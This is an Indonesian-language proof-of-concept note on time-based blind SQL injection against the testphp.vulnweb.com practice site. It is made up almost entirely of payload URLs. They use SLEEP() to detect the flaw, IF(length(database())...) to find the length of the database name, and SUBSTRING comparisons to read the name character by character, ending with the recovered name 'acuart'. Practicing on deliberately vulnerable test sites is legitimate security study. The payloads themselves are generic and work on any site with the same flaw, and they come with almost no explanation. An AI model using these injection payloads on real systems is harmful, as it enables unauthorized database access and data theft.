PoC SQL Injection | Day 4
:+:
+%+%+%+%+%+%+%+%+%+%+%+%+%+
<<Menebak rentan sqli atau tidaknya,, berdasarkan waktu respon suatu website>>

. #http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(10)

. #http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(9)

. #http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(8)

. #http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(7)

. #http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(6)

. #http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(5)
-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
<<Menebak panjang huruf, dari nama database tersebut>>

. #http://testphp.vulnweb.com/artists.php?artist=1-IF((length(database()))=1,SLEEP(5),0)

. #http://testphp.vulnweb.com/artists.php?artist=1-IF((length(database()))=2,SLEEP(5),0)

. #http://testphp.vulnweb.com/artists.php?artist=1-IF((length(database()))=3,SLEEP(5),0)

. #http://testphp.vulnweb.com/artists.php?artist=1-IF((length(database()))=4,SLEEP(5),0)

. #http://testphp.vulnweb.com/artists.php?artist=1-IF((length(database()))=5,SLEEP(5),0)

. #http://testphp.vulnweb.com/artists.php?artist=1-IF((length(database()))=6,SLEEP(5),0)
-%-%-%-%-%-%-%-%-%-%-%-%-%-%-%-%-
<<Menembak huruf awal sampai akhir, dari nama database sistem tersebut>>

. #http://testphp.vulnweb.com/artists.php?artist=1 AND SUBSTRING(database(), 1, 1) = 'a' AND SLEEP(5)

. #http://testphp.vulnweb.com/artists.php?artist=1 AND SUBSTRING(database(), 2, 1) = 'c' AND SLEEP(5)

. #http://testphp.vulnweb.com/artists.php?artist=1 AND SUBSTRING(database(), 3, 1) = 'u' AND SLEEP(5)

. #http://testphp.vulnweb.com/artists.php?artist=1 AND SUBSTRING(database(), 4, 1) = 'a' AND SLEEP(5)

. #http://testphp.vulnweb.com/artists.php?artist=1 AND SUBSTRING(database(), 5, 1) = 'r' AND SLEEP(5)

. #http://testphp.vulnweb.com/artists.php?artist=1 AND SUBSTRING(database(), 6, 1) = 't' AND SLEEP(5)

.

.

Yapss Bener Banget tuh Bro!.

Nama DataBase =``acuart``=